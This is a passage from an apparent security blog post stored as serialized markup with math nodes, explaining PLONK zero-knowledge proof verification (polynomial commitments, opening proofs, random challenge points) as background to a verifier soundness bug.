:149808,"children":149810},{"className":149809},[28514],[149811],{"type":30,"value":28517},{"type":24,"tag":301,"props":149813,"children":149815},{"className":149814},[10860],[149816],{"type":24,"tag":301,"props":149817,"children":149819},{"className":149818,"style":99828},[10865],[149820],{"type":24,"tag":301,"props":149821,"children":149822},{},[],{"type":24,"tag":301,"props":149824,"children":149826},{"className":149825},[28486],[149827],{"type":30,"value":362},{"type":24,"tag":301,"props":149829,"children":149831},{"className":149830},[10835,28357],[149832],{"type":30,"value":26050},{"type":24,"tag":301,"props":149834,"children":149836},{"className":149835},[28508],[149837],{"type":30,"value":9961},{"type":30,"value":377},{"type":24,"tag":145,"props":149840,"children":149842},{"className":149841},[10807,10808],[149843],{"type":24,"tag":301,"props":149844,"children":149846},{"className":149845},[10813],[149847],{"type":24,"tag":301,"props":149848,"children":149850},{"className":149849,"ariaHidden":10819},[10818],[149851],{"type":24,"tag":301,"props":149852,"children":149854},{"className":149853},[10824],[149855,149859,149916,149921,149926],{"type":24,"tag":301,"props":149856,"children":149858},{"className":149857,"style":10935},[10829],[],{"type":24,"tag":301,"props":149860,"children":149862},{"className":149861},[10835],[149863,149868],{"type":24,"tag":301,"props":149864,"children":149866},{"className":149865},[10835,28357],[149867],{"type":30,"value":83514},{"type":24,"tag":301,"props":149869,"children":149871},{"className":149870},[10850],[149872],{"type":24,"tag":301,"props":149873,"children":149875},{"className":149874},[10855,28411],[149876,149905],{"type":24,"tag":301,"props":149877,"children":149879},{"className":149878},[10860],[149880,149900],{"type":24,"tag":301,"props":149881,"children":149883},{"className":149882,"style":149269},[10865],[149884],{"type":24,"tag":301,"props":149885,"children":149886},{"style":99801},[149887,149891],{"type":24,"tag":301,"props":149888,"children":149890},{"className":149889,"style":10875},[10874],[],{"type":24,"tag":301,"props":149892,"children":149894},{"className":149893},[10880,10881,10882,10883],[149895],{"type":24,"tag":301,"props":149896,"children":149898},{"className":149897},[10835,28357,10883],[149899],{"type":30,"value":124703},{"type":24,"tag":301,"props":149901,"children":149903},{"className":149902},[28514],[149904],{"type":30,"value":28517},{"type":24,"tag":301,"props":149906,"children":149908},{"className":149907},[10860],[149909],{"type":24,"tag":301,"props":149910,"children":149912},{"className":149911,"style":99828},[10865],[149913],{"type":24,"tag":301,"props":149914,"children":149915},{},[],{"type":24,"tag":301,"props":149917,"children":149919},{"className":149918},[28486],[149920],{"type":30,"value":362},{"type":24,"tag":301,"props":149922,"children":149924},{"className":149923},[10835,28357],[149925],{"type":30,"value":26050},{"type":24,"tag":301,"props":149927,"children":149929},{"className":149928},[28508],[149930],{"type":30,"value":9961},{"type":30,"value":149932},", etc., all interpolated over a domain ",{"type":24,"tag":145,"props":149934,"children":149936},{"className":149935},[10807,10808],[149937],{"type":24,"tag":301,"props":149938,"children":149940},{"className":149939},[10813],[149941],{"type":24,"tag":301,"props":149942,"children":149944},{"className":149943,"ariaHidden":10819},[10818],[149945],{"type":24,"tag":301,"props":149946,"children":149948},{"className":149947},[10824],[149949,149953],{"type":24,"tag":301,"props":149950,"children":149952},{"className":149951,"style":28352},[10829],[],{"type":24,"tag":301,"props":149954,"children":149956},{"className":149955,"style":99979},[10835,28357],[149957],{"type":30,"value":99982},{"type":30,"value":730},{"type":24,"tag":145,"props":149960,"children":149962},{"className":149961},[10807,10808],[149963],{"type":24,"tag":301,"props":149964,"children":149966},{"className":149965},[10813],[149967],{"type":24,"tag":301,"props":149968,"children":149970},{"className":149969,"ariaHidden":10819},[10818],[149971],{"type":24,"tag":301,"props":149972,"children":149974},{"className":149973},[10824],[149975,149979],{"type":24,"tag":301,"props":149976,"children":149978},{"className":149977,"style":117581},[10829],[],{"type":24,"tag":301,"props":149980,"children":149982},{"className":149981},[10835,28357],[149983],{"type":30,"value":63123},{"type":30,"value":149985},"-th roots of unity. Evaluating ",{"type":24,"tag":145,"props":149987,"children":149989},{"className":149988},[10807,10808],[149990],{"type":24,"tag":301,"props":149991,"children":149993},{"className":149992},[10813],[149994],{"type":24,"tag":301,"props":149995,"children":149997},{"className":149996,"ariaHidden":10819},[10818],[149998],{"type":24,"tag":301,"props":149999,"children":150001},{"className":150000},[10824],[150002,150006,150063,150068,150073],{"type":24,"tag":301,"props":150003,"children":150005},{"className":150004,"style":10935},[10829],[],{"type":24,"tag":301,"props":150007,"children":150009},{"className":150008},[10835],[150010,150015],{"type":24,"tag":301,"props":150011,"children":150013},{"className":150012,"style":102098},[10835,28357],[150014],{"type":30,"value":39835},{"type":24,"tag":301,"props":150016,"children":150018},{"className":150017},[10850],[150019],{"type":24,"tag":301,"props":150020,"children":150022},{"className":150021},[10855,28411],[150023,150052],{"type":24,"tag":301,"props":150024,"children":150026},{"className":150025},[10860],[150027,150047],{"type":24,"tag":301,"props":150028,"children":150030},{"className":150029,"style":149269},[10865],[150031],{"type":24,"tag":301,"props":150032,"children":150033},{"style":102119},[150034,150038],{"type":24,"tag":301,"props":150035,"children":150037},{"className":150036,"style":10875},[10874],[],{"type":24,"tag":301,"props":150039,"children":150041},{"className":150040},[10880,10881,10882,10883],[150042],{"type":24,"tag":301,"props":150043,"children":150045},{"className":150044},[10835,28357,10883],[150046],{"type":30,"value":124703},{"type":24,"tag":301,"props":150048,"children":150050},{"className":150049},[28514],[150051],{"type":30,"value":28517},{"type":24,"tag":301,"props":150053,"children":150055},{"className":150054},[10860],[150056],{"type":24,"tag":301,"props":150057,"children":150059},{"className":150058,"style":99828},[10865],[150060],{"type":24,"tag":301,"props":150061,"children":150062},{},[],{"type":24,"tag":301,"props":150064,"children":150066},{"className":150065},[28486],[150067],{"type":30,"value":362},{"type":24,"tag":301,"props":150069,"children":150071},{"className":150070},[10835,28357],[150072],{"type":30,"value":26050},{"type":24,"tag":301,"props":150074,"children":150076},{"className":150075},[28508],[150077],{"type":30,"value":9961},{"type":30,"value":150079}," at the ",{"type":24,"tag":145,"props":150081,"children":150083},{"className":150082},[10807,10808],[150084],{"type":24,"tag":301,"props":150085,"children":150087},{"className":150086},[10813],[150088],{"type":24,"tag":301,"props":150089,"children":150091},{"className":150090,"ariaHidden":10819},[10818],[150092],{"type":24,"tag":301,"props":150093,"children":150095},{"className":150094},[10824],[150096,150100],{"type":24,"tag":301,"props":150097,"children":150099},{"className":150098,"style":148965},[10829],[],{"type":24,"tag":301,"props":150101,"children":150103},{"className":150102},[10835,28357],[150104],{"type":30,"value":10564},{"type":30,"value":150106},"-th root recovers the left wire value at row ",{"type":24,"tag":145,"props":150108,"children":150110},{"className":150109},[10807,10808],[150111],{"type":24,"tag":301,"props":150112,"children":150114},{"className":150113},[10813],[150115],{"type":24,"tag":301,"props":150116,"children":150118},{"className":150117,"ariaHidden":10819},[10818],[150119],{"type":24,"tag":301,"props":150120,"children":150122},{"className":150121},[10824],[150123,150127],{"type":24,"tag":301,"props":150124,"children":150126},{"className":150125,"style":148965},[10829],[],{"type":24,"tag":301,"props":150128,"children":150130},{"className":150129},[10835,28357],[150131],{"type":30,"value":10564},{"type":30,"value":206},{"type":24,"tag":150134,"props":150135,"children":150136},"polynomial-interpolation-panel",{},[],{"type":24,"tag":32,"props":150138,"children":150139},{},[150140,150142,150182,150184,150250,150252,150382,150384,150424,150426,150466,150468,150508,150509,150631],{"type":30,"value":150141},"Because all columns are now polynomials, the entire circuit compresses into a single master constraint polynomial ",{"type":24,"tag":145,"props":150143,"children":150145},{"className":150144},[10807,10808],[150146],{"type":24,"tag":301,"props":150147,"children":150149},{"className":150148},[10813],[150150],{"type":24,"tag":301,"props":150151,"children":150153},{"className":150152,"ariaHidden":10819},[10818],[150154],{"type":24,"tag":301,"props":150155,"children":150157},{"className":150156},[10824],[150158,150162,150167,150172,150177],{"type":24,"tag":301,"props":150159,"children":150161},{"className":150160,"style":10935},[10829],[],{"type":24,"tag":301,"props":150163,"children":150165},{"className":150164,"style":28358},[10835,28357],[150166],{"type":30,"value":128516},{"type":24,"tag":301,"props":150168,"children":150170},{"className":150169},[28486],[150171],{"type":30,"value":362},{"type":24,"tag":301,"props":150173,"children":150175},{"className":150174},[10835,28357],[150176],{"type":30,"value":26050},{"type":24,"tag":301,"props":150178,"children":150180},{"className":150179},[28508],[150181],{"type":30,"value":9961},{"type":30,"value":150183}," that combines selectors and witnesses. If the prover was honest, ",{"type":24,"tag":145,"props":150185,"children":150187},{"className":150186},[10807,10808],[150188],{"type":24,"tag":301,"props":150189,"children":150191},{"className":150190},[10813],[150192],{"type":24,"tag":301,"props":150193,"children":150195},{"className":150194,"ariaHidden":10819},[10818],[150196,150237],{"type":24,"tag":301,"props":150197,"children":150199},{"className":150198},[10824],[150200,150204,150209,150214,150219,150224,150228,150233],{"type":24,"tag":301,"props":150201,"children":150203},{"className":150202,"style":10935},[10829],[],{"type":24,"tag":301,"props":150205,"children":150207},{"className":150206,"style":28358},[10835,28357],[150208],{"type":30,"value":128516},{"type":24,"tag":301,"props":150210,"children":150212},{"className":150211},[28486],[150213],{"type":30,"value":362},{"type":24,"tag":301,"props":150215,"children":150217},{"className":150216},[10835,28357],[150218],{"type":30,"value":26050},{"type":24,"tag":301,"props":150220,"children":150222},{"className":150221},[28508],[150223],{"type":30,"value":9961},{"type":24,"tag":301,"props":150225,"children":150227},{"className":150226,"style":11012},[10914],[],{"type":24,"tag":301,"props":150229,"children":150231},{"className":150230},[11017],[150232],{"type":30,"value":523},{"type":24,"tag":301,"props":150234,"children":150236},{"className":150235,"style":11012},[10914],[],{"type":24,"tag":301,"props":150238,"children":150240},{"className":150239},[10824],[150241,150245],{"type":24,"tag":301,"props":150242,"children":150244},{"className":150243,"style":100775},[10829],[],{"type":24,"tag":301,"props":150246,"children":150248},{"className":150247},[10835],[150249],{"type":30,"value":584},{"type":30,"value":150251}," at every row index in the domain. The vanishing polynomial ",{"type":24,"tag":145,"props":150253,"children":150255},{"className":150254},[10807,10808],[150256],{"type":24,"tag":301,"props":150257,"children":150259},{"className":150258},[10813],[150260],{"type":24,"tag":301,"props":150261,"children":150263},{"className":150262,"ariaHidden":10819},[10818],[150264,150306,150369],{"type":24,"tag":301,"props":150265,"children":150267},{"className":150266},[10824],[150268,150272,150278,150283,150288,150293,150297,150302],{"type":24,"tag":301,"props":150269,"children":150271},{"className":150270,"style":10935},[10829],[],{"type":24,"tag":301,"props":150273,"children":150275},{"className":150274,"style":28889},[10835,28357],[150276],{"type":30,"value":150277},"Z",{"type":24,"tag":301,"props":150279,"children":150281},{"className":150280},[28486],[150282],{"type":30,"value":362},{"type":24,"tag":301,"props":150284,"children":150286},{"className":150285},[10835,28357],[150287],{"type":30,"value":26050},{"type":24,"tag":301,"props":150289,"children":150291},{"className":150290},[28508],[150292],{"type":30,"value":9961},{"type":24,"tag":301,"props":150294,"children":150296},{"className":150295,"style":11012},[10914],[],{"type":24,"tag":301,"props":150298,"children":150300},{"className":150299},[11017],[150301],{"type":30,"value":523},{"type":24,"tag":301,"props":150303,"children":150305},{"className":150304,"style":11012},[10914],[],{"type":24,"tag":301,"props":150307,"children":150309},{"className":150308},[10824],[150310,150315,150356,150360,150365],{"type":24,"tag":301,"props":150311,"children":150314},{"className":150312,"style":150313},[10829],"height:0.7477em;vertical-align:-0.0833em;",[],{"type":24,"tag":301,"props":150316,"children":150318},{"className":150317},[10835],[150319,150324],{"type":24,"tag":301,"props":150320,"children":150322},{"className":150321},[10835,28357],[150323],{"type":30,"value":26050},{"type":24,"tag":301,"props":150325,"children":150327},{"className":150326},[10850],[150328],{"type":24,"tag":301,"props":150329,"children":150331},{"className":150330},[10855],[150332],{"type":24,"tag":301,"props":150333,"children":150335},{"className":150334},[10860],[150336],{"type":24,"tag":301,"props":150337,"children":150339},{"className":150338,"style":115458},[10865],[150340],{"type":24,"tag":301,"props":150341,"children":150342},{"style":10869},[150343,150347],{"type":24,"tag":301,"props":150344,"children":150346},{"className":150345,"style":10875},[10874],[],{"type":24,"tag":301,"props":150348,"children":150350},{"className":150349},[10880,10881,10882,10883],[150351],{"type":24,"tag":301,"props":150352,"children":150354},{"className":150353},[10835,28357,10883],[150355],{"type":30,"value":63123},{"type":24,"tag":301,"props":150357,"children":150359},{"className":150358,"style":10915},[10914],[],{"type":24,"tag":301,"props":150361,"children":150363},{"className":150362},[10920],[150364],{"type":30,"value":10894},{"type":24,"tag":301,"props":150366,"children":150368},{"className":150367,"style":10915},[10914],[],{"type":24,"tag":301,"props":150370,"children":150372},{"className":150371},[10824],[150373,150377],{"type":24,"tag":301,"props":150374,"children":150376},{"className":150375,"style":100775},[10829],[],{"type":24,"tag":301,"props":150378,"children":150380},{"className":150379},[10835],[150381],{"type":30,"value":546},{"type":30,"value":150383}," is zero on exactly those points, so if all constraints hold then ",{"type":24,"tag":145,"props":150385,"children":150387},{"className":150386},[10807,10808],[150388],{"type":24,"tag":301,"props":150389,"children":150391},{"className":150390},[10813],[150392],{"type":24,"tag":301,"props":150393,"children":150395},{"className":150394,"ariaHidden":10819},[10818],[150396],{"type":24,"tag":301,"props":150397,"children":150399},{"className":150398},[10824],[150400,150404,150409,150414,150419],{"type":24,"tag":301,"props":150401,"children":150403},{"className":150402,"style":10935},[10829],[],{"type":24,"tag":301,"props":150405,"children":150407},{"className":150406,"style":28889},[10835,28357],[150408],{"type":30,"value":150277},{"type":24,"tag":301,"props":150410,"children":150412},{"className":150411},[28486],[150413],{"type":30,"value":362},{"type":24,"tag":301,"props":150415,"children":150417},{"className":150416},[10835,28357],[150418],{"type":30,"value":26050},{"type":24,"tag":301,"props":150420,"children":150422},{"className":150421},[28508],[150423],{"type":30,"value":9961},{"type":30,"value":150425}," divides ",{"type":24,"tag":145,"props":150427,"children":150429},{"className":150428},[10807,10808],[150430],{"type":24,"tag":301,"props":150431,"children":150433},{"className":150432},[10813],[150434],{"type":24,"tag":301,"props":150435,"children":150437},{"className":150436,"ariaHidden":10819},[10818],[150438],{"type":24,"tag":301,"props":150439,"children":150441},{"className":150440},[10824],[150442,150446,150451,150456,150461],{"type":24,"tag":301,"props":150443,"children":150445},{"className":150444,"style":10935},[10829],[],{"type":24,"tag":301,"props":150447,"children":150449},{"className":150448,"style":28358},[10835,28357],[150450],{"type":30,"value":128516},{"type":24,"tag":301,"props":150452,"children":150454},{"className":150453},[28486],[150455],{"type":30,"value":362},{"type":24,"tag":301,"props":150457,"children":150459},{"className":150458},[10835,28357],[150460],{"type":30,"value":26050},{"type":24,"tag":301,"props":150462,"children":150464},{"className":150463},[28508],[150465],{"type":30,"value":9961},{"type":30,"value":150467},", yielding a quotient polynomial ",{"type":24,"tag":145,"props":150469,"children":150471},{"className":150470},[10807,10808],[150472],{"type":24,"tag":301,"props":150473,"children":150475},{"className":150474},[10813],[150476],{"type":24,"tag":301,"props":150477,"children":150479},{"className":150478,"ariaHidden":10819},[10818],[150480],{"type":24,"tag":301,"props":150481,"children":150483},{"className":150482},[10824],[150484,150488,150493,150498,150503],{"type":24,"tag":301,"props":150485,"children":150487},{"className":150486,"style":10935},[10829],[],{"type":24,"tag":301,"props":150489,"children":150491},{"className":150490,"style":28358},[10835,28357],[150492],{"type":30,"value":12807},{"type":24,"tag":301,"props":150494,"children":150496},{"className":150495},[28486],[150497],{"type":30,"value":362},{"type":24,"tag":301,"props":150499,"children":150501},{"className":150500},[10835,28357],[150502],{"type":30,"value":26050},{"type":24,"tag":301,"props":150504,"children":150506},{"className":150505},[28508],[150507],{"type":30,"value":9961},{"type":30,"value":28273},{"type":24,"tag":145,"props":150510,"children":150512},{"className":150511},[10807,10808],[150513],{"type":24,"tag":301,"props":150514,"children":150516},{"className":150515},[10813],[150517],{"type":24,"tag":301,"props":150518,"children":150520},{"className":150519,"ariaHidden":10819},[10818],[150521,150562,150603],{"type":24,"tag":301,"props":150522,"children":150524},{"className":150523},[10824],[150525,150529,150534,150539,150544,150549,150553,150558],{"type":24,"tag":301,"props":150526,"children":150528},{"className":150527,"style":10935},[10829],[],{"type":24,"tag":301,"props":150530,"children":150532},{"className":150531,"style":28358},[10835,28357],[150533],{"type":30,"value":128516},{"type":24,"tag":301,"props":150535,"children":150537},{"className":150536},[28486],[150538],{"type":30,"value":362},{"type":24,"tag":301,"props":150540,"children":150542},{"className":150541},[10835,28357],[150543],{"type":30,"value":26050},{"type":24,"tag":301,"props":150545,"children":150547},{"className":150546},[28508],[150548],{"type":30,"value":9961},{"type":24,"tag":301,"props":150550,"children":150552},{"className":150551,"style":11012},[10914],[],{"type":24,"tag":301,"props":150554,"children":150556},{"className":150555},[11017],[150557],{"type":30,"value":523},{"type":24,"tag":301,"props":150559,"children":150561},{"className":150560,"style":11012},[10914],[],{"type":24,"tag":301,"props":150563,"children":150565},{"className":150564},[10824],[150566,150570,150575,150580,150585,150590,150594,150599],{"type":24,"tag":301,"props":150567,"children":150569},{"className":150568,"style":10935},[10829],[],{"type":24,"tag":301,"props":150571,"children":150573},{"className":150572,"style":28358},[10835,28357],[150574],{"type":30,"value":12807},{"type":24,"tag":301,"props":150576,"children":150578},{"className":150577},[28486],[150579],{"type":30,"value":362},{"type":24,"tag":301,"props":150581,"children":150583},{"className":150582},[10835,28357],[150584],{"type":30,"value":26050},{"type":24,"tag":301,"props":150586,"children":150588},{"className":150587},[28508],[150589],{"type":30,"value":9961},{"type":24,"tag":301,"props":150591,"children":150593},{"className":150592,"style":10915},[10914],[],{"type":24,"tag":301,"props":150595,"children":150597},{"className":150596},[10920],[150598],{"type":30,"value":118002},{"type":24,"tag":301,"props":150600,"children":150602},{"className":150601,"style":10915},[10914],[],{"type":24,"tag":301,"props":150604,"children":150606},{"className":150605},[10824],[150607,150611,150616,150621,150626],{"type":24,"tag":301,"props":150608,"children":150610},{"className":150609,"style":10935},[10829],[],{"type":24,"tag":301,"props":150612,"children":150614},{"className":150613,"style":28889},[10835,28357],[150615],{"type":30,"value":150277},{"type":24,"tag":301,"props":150617,"children":150619},{"className":150618},[28486],[150620],{"type":30,"value":362},{"type":24,"tag":301,"props":150622,"children":150624},{"className":150623},[10835,28357],[150625],{"type":30,"value":26050},{"type":24,"tag":301,"props":150627,"children":150629},{"className":150628},[28508],[150630],{"type":30,"value":9961},{"type":30,"value":206},{"type":24,"tag":32,"props":150633,"children":150634},{},[150635],{"type":24,"tag":177,"props":150636,"children":150639},{"alt":150637,"src":150638},"master_equation","/posts/dusk-commitment-issues/master_equation.svg",[],{"type":24,"tag":80,"props":150641,"children":150643},{"id":150642},"polynomial-commitments-and-opening-proofs",[150644],{"type":30,"value":150645},"Polynomial commitments and opening proofs",{"type":24,"tag":32,"props":150647,"children":150648},{},[150649,150651,150656,150658,150663],{"type":30,"value":150650},"To keep the proof short, the prover doesn't send polynomials directly. Instead, it sends ",{"type":24,"tag":5422,"props":150652,"children":150653},{},[150654],{"type":30,"value":150655},"commitments",{"type":30,"value":150657},", short cryptographic fingerprints of each polynomial (using e.g. KZG commitments). When the verifier needs the value of a committed polynomial at a specific point, the prover provides the value along with an ",{"type":24,"tag":5422,"props":150659,"children":150660},{},[150661],{"type":30,"value":150662},"opening proof",{"type":30,"value":150664}," that the claimed value is consistent with the earlier commitment.",{"type":24,"tag":32,"props":150666,"children":150667},{},[150668],{"type":30,"value":150669},"A committed polynomial evaluation is therefore cryptographically bound, and the prover cannot lie about the value without being caught.",{"type":24,"tag":80,"props":150671,"children":150673},{"id":150672},"reducing-to-a-single-random-point",[150674],{"type":30,"value":150675},"Reducing to a single random point",{"type":24,"tag":32,"props":150677,"children":150678},{},[150679,150681,150721,150723,150748,150750,150872,150874,150899],{"type":30,"value":150680},"After the prover commits to all polynomials, including ",{"type":24,"tag":145,"props":150682,"children":150684},{"className":150683},[10807,10808],[150685],{"type":24,"tag":301,"props":150686,"children":150688},{"className":150687},[10813],[150689],{"type":24,"tag":301,"props":150690,"children":150692},{"className":150691,"ariaHidden":10819},[10818],[150693],{"type":24,"tag":301,"props":150694,"children":150696},{"className":150695},[10824],[150697,150701,150706,150711,150716],{"type":24,"tag":301,"props":150698,"children":150700},{"className":150699,"style":10935},[10829],[],{"type":24,"tag":301,"props":150702,"children":150704},{"className":150703,"style":28358},[10835,28357],[150705],{"type":30,"value":12807},{"type":24,"tag":301,"props":150707,"children":150709},{"className":150708},[28486],[150710],{"type":30,"value":362},{"type":24,"tag":301,"props":150712,"children":150714},{"className":150713},[10835,28357],[150715],{"type":30,"value":26050},{"type":24,"tag":301,"props":150717,"children":150719},{"className":150718},[28508],[150720],{"type":30,"value":9961},{"type":30,"value":150722},", the verifier picks a random challenge point ",{"type":24,"tag":145,"props":150724,"children":150726},{"className":150725},[10807,10808],[150727],{"type":24,"tag":301,"props":150728,"children":150730},{"className":150729},[10813],[150731],{"type":24,"tag":301,"props":150732,"children":150734},{"className":150733,"ariaHidden":10819},[10818],[150735],{"type":24,"tag":301,"props":150736,"children":150738},{"className":150737},[10824],[150739,150743],{"type":24,"tag":301,"props":150740,"children":150742},{"className":150741,"style":117581},[10829],[],{"type":24,"tag":301,"props":150744,"children":150746},{"className":150745,"style":120296},[10835,28357],[150747],{"type":30,"value":120299},{"type":30,"value":150749}," (derived via the Fiat-Shamir heuristic from the transcript) and checks ",{"type":24,"tag":145,"props":150751,"children":150753},{"className":150752},[10807,10808],[150754],{"type":24,"tag":301,"props":150755,"children":150757},{"className":150756},[10813],[150758],{"type":24,"tag":301,"props":150759,"children":150761},{"className":150760,"ariaHidden":10819},[10818],[150762,150803,150844],{"type":24,"tag":301,"props":150763,"children":150765},{"className":150764},[10824],[150766,150770,150775,150780,150785,150790,150794,150799],{"type":24,"tag":301,"props":150767,"children":150769},{"className":150768,"style":10935},[10829],[],{"type":24,"tag":301,"props":150771,"children":150773},{"className":150772,"style":28358},[10835,28357],[150774],{"type":30,"value":128516},{"type":24,"tag":301,"props":150776,"children":150778},{"className":150777},[28486],[150779],{"type":30,"value":362},{"type":24,"tag":301,"props":150781,"children":150783},{"className":150782,"style":120296},[10835,28357],[150784],{"type":30,"value":120299},{"type":24,"tag":301,"props":150786,"children":150788},{"className":150787},[28508],[150789],{"type":30,"value":9961},{"type":24,"tag":301,"props":150791,"children":150793},{"className":150792,"style":11012},[10914],[],{"type":24,"tag":301,"props":150795,"children":150797},{"className":150796},[11017],[150798],{"type":30,"value":523},{"type":24,"tag":301,"props":150800,"children":150802},{"className":150801,"style":11012},[10914],[],{"type":24,"tag":301,"props":150804,"children":150806},{"className":150805},[10824],[150807,150811,150816,150821,150826,150831,150835,150840],{"type":24,"tag":301,"props":150808,"children":150810},{"className":150809,"style":10935},[10829],[],{"type":24,"tag":301,"props":150812,"children":150814},{"className":150813,"style":28358},[10835,28357],[150815],{"type":30,"value":12807},{"type":24,"tag":301,"props":150817,"children":150819},{"className":150818},[28486],[150820],{"type":30,"value":362},{"type":24,"tag":301,"props":150822,"children":150824},{"className":150823,"style":120296},[10835,28357],[150825],{"type":30,"value":120299},{"type":24,"tag":301,"props":150827,"children":150829},{"className":150828},[28508],[150830],{"type":30,"value":9961},{"type":24,"tag":301,"props":150832,"children":150834},{"className":150833,"style":10915},[10914],[],{"type":24,"tag":301,"props":150836,"children":150838},{"className":150837},[10920],[150839],{"type":30,"value":118002},{"type":24,"tag":301,"props":150841,"children":150843},{"className":150842,"style":10915},[10914],[],{"type":24,"tag":301,"props":150845,"children":150847},{"className":150846},[10824],[150848,150852,150857,150862,150867],{"type":24,"tag":301,"props":150849,"children":150851},{"className":150850,"style":10935},[10829],[],{"type":24,"tag":301,"props":150853,"children":150855},{"className":150854,"style":28889},[10835,28357],[150856],{"type":30,"value":150277},{"type":24,"tag":301,"props":150858,"children":150860},{"className":150859},[28486],[150861],{"type":30,"value":362},{"type":24,"tag":301,"props":150863,"children":150865},{"className":150864,"style":120296},[10835,28357],[150866],{"type":30,"value":120299},{"type":24,"tag":301,"props":150868,"children":150870},{"className":150869},[28508],[150871],{"type":30,"value":9961},{"type":30,"value":150873}," at that single point. By the Schwartz-Zippel lemma, if this holds at a random ",{"type":24,"tag":145,"props":150875,"children":150877},{"className":150876},[10807,10808],[150878],{"type":24,"tag":301,"props":150879,"children":150881},{"className":150880},[10813],[150882],{"type":24,"tag":301,"props":150883,"children":150885},{"className":150884,"ariaHidden":10819},[10818],[150886],{"type":24,"tag":301,"props":150887,"children":150889},{"className":150888},[10824],[150890,150894],{"type":24,"tag":301,"props":150891,"children":150893},{"className":150892,"style":117581},[10829],[],{"type":24,"tag":301,"props":150895,"children":150897},{"className":150896,"style":120296},[10835,28357],[150898],{"type":30,"value":120299},{"type":30,"value":150900}," then the full polynomial identity holds with overwhelming probability, so the verifier checks the entire multi-million-row circuit in constant time.",{"type":24,"tag":32,"props":150902,"children":150903},{},[150904,150906,150931,150933,150938],{"type":30,"value":150905},"In textbook PLONK the selector polynomials are part of the fixed circuit description, but in practice implementations commit to them during preprocessing and place those commitments in the verifier key. When the verifier later needs their values at ",{"type":24,"tag":145,"props":150907,"children":150909},{"className":150908},[10807,10808],[150910],{"type":24,"tag":301,"props":150911,"children":150913},{"className":150912},[10813],[150914],{"type":24,"tag":301,"props":150915,"children":150917},{"className":150916,"ariaHidden":10819},[10818],[150918],{"type":24,"tag":301,"props":150919,"children":150921},{"className":150920},[10824],[150922,150926],{"type":24,"tag":301,"props":150923,"children":150925},{"className":150924,"style":117581},[10829],[],{"type":24,"tag":301,"props":150927,"children":150929},{"className":150928,"style":120296},[10835,28357],[150930],{"type":30,"value":120299},{"type":30,"value":150932},", the prover supplies ",{"type":24,"tag":5422,"props":150934,"children":150935},{},[150936],{"type":30,"value":150937},"evaluation claims",{"type":30,"value":150939}," that must be checked against those commitments with opening proofs.",{"type":24,"tag":32,"props":150941,"children":150942},{},[150943,150945,150949],{"type":30,"value":150944},"The security argument depends on a chain: commitments lock the prover into polynomials ",{"type":24,"tag":5422,"props":150946,"children":150947},{},[150948],{"type":30,"value":111285},{"type":30,"value":150950}," challenges are derived, and opening proofs ensure the evaluations are consistent with those commitments. Breaking any single link in this chain collapses soundness entirely.",{"type":24,"tag":80,"props":150952,"children":150954},{"id":150953},"what-the-verifier-is-actually-allowed-to-trust",[150955],{"type":30,"value":150956},"What the verifier is actually allowed to trust",{"type":24,"tag":32,"props":150958,"children":150959},{},[150960,150962,150967],{"type":30,"value":150961},"For this bug, one invariant matters more than the rest: ",{"type":24,"tag":60,"props":150963,"children":150964},{},[150965],{"type":30,"value":150966},"every scalar that enters the final verifier equation must be either locally computed by the verifier, or cryptographically tied to an earlier commitment",{"type":30,"value":206},{"type":24,"tag":32,"props":150969,"children":150970},{},[150971,150973,151065,151066,151158,151160,151185,151187,151227,151228,151268,151269,151362,151363,151409,151411,151498,151499,151586,151587,151674],{"type":30,"value":150972},"In practice, values entering the verifier equation fall into three buckets. The verifier computes some values locally from public data (",{"type":24,"tag":145,"props":150974,"children":150976},{"className":150975},[10807,10808],[150977],{"type":24,"tag":301,"props":150978,"children":150980},{"className":150979},[10813],[150981],{"type":24,"tag":301,"props":150982,"children":150984},{"className":150983,"ariaHidden":10819},[10818],[150985],{"type":24,"tag":301,"props":150986,"children":150988},{"className":150987},[10824],[150989,150993,151050,151055,151060],{"type":24,"tag":301,"props":150990,"children":150992},{"className":150991,"style":10935},[10829],[],{"type":24,"tag":301,"props":150994,"children":150996},{"className":150995},[10835],[150997,151002],{"type":24,"tag":301,"props":150998,"children":151000},{"className":150999,"style":28889},[10835,28357],[151001],{"type":30,"value":150277},{"type":24,"tag":301,"props":151003,"children":151005},{"className":151004},[10850],[151006],{"type":24,"tag":301,"props":151007,"children":151009},{"className":151008},[10855,28411],[151010,151039],{"type":24,"tag":301,"props":151011,"children":151013},{"className":151012},[10860],[151014,151034],{"type":24,"tag":301,"props":151015,"children":151017},{"className":151016,"style":149269},[10865],[151018],{"type":24,"tag":301,"props":151019,"children":151020},{"style":122988},[151021,151025],{"type":24,"tag":301,"props":151022,"children":151024},{"className":151023,"style":10875},[10874],[],{"type":24,"tag":301,"props":151026,"children":151028},{"className":151027},[10880,10881,10882,10883],[151029],{"type":24,"tag":301,"props":151030,"children":151032},{"className":151031,"style":99979},[10835,28357,10883],[151033],{"type":30,"value":99982},{"type":24,"tag":301,"props":151035,"children":151037},{"className":151036},[28514],[151038],{"type":30,"value":28517},{"type":24,"tag":301,"props":151040,"children":151042},{"className":151041},[10860],[151043],{"type":24,"tag":301,"props":151044,"children":151046},{"className":151045,"style":99828},[10865],[151047],{"type":24,"tag":301,"props":151048,"children":151049},{},[],{"type":24,"tag":301,"props":151051,"children":151053},{"className":151052},[28486],[151054],{"type":30,"value":362},{"type":24,"tag":301,"props":151056,"children":151058},{"className":151057,"style":120296},[10835,28357],[151059],{"type":30,"value":120299},{"type":24,"tag":301,"props":151061,"children":151063},{"className":151062},[28508],[151064],{"type":30,"value":9961},{"type":30,"value":377},{"type":24,"tag":145,"props":151067,"children":151069},{"className":151068},[10807,10808],[151070],{"type":24,"tag":301,"props":151071,"children":151073},{"className":151072},[10813],[151074],{"type":24,"tag":301,"props":151075,"children":151077},{"className":151076,"ariaHidden":10819},[10818],[151078],{"type":24,"tag":301,"props":151079,"children":151081},{"className":151080},[10824],[151082,151086,151143,151148,151153],{"type":24,"tag":301,"props":151083,"children":151085},{"className":151084,"style":10935},[10829],[],{"type":24,"tag":301,"props":151087,"children":151089},{"className":151088},[10835],[151090,151095],{"type":24,"tag":301,"props":151091,"children":151093},{"className":151092},[10835,28357],[151094],{"type":30,"value":124703},{"type":24,"tag":301,"props":151096,"children":151098},{"className":151097},[10850],[151099],{"type":24,"tag":301,"props":151100,"children":151102},{"className":151101},[10855,28411],[151103,151132],{"type":24,"tag":301,"props":151104,"children":151106},{"className":151105},[10860],[151107,151127],{"type":24,"tag":301,"props":151108,"children":151110},{"className":151109,"style":99797},[10865],[151111],{"type":24,"tag":301,"props":151112,"children":151113},{"style":99801},[151114,1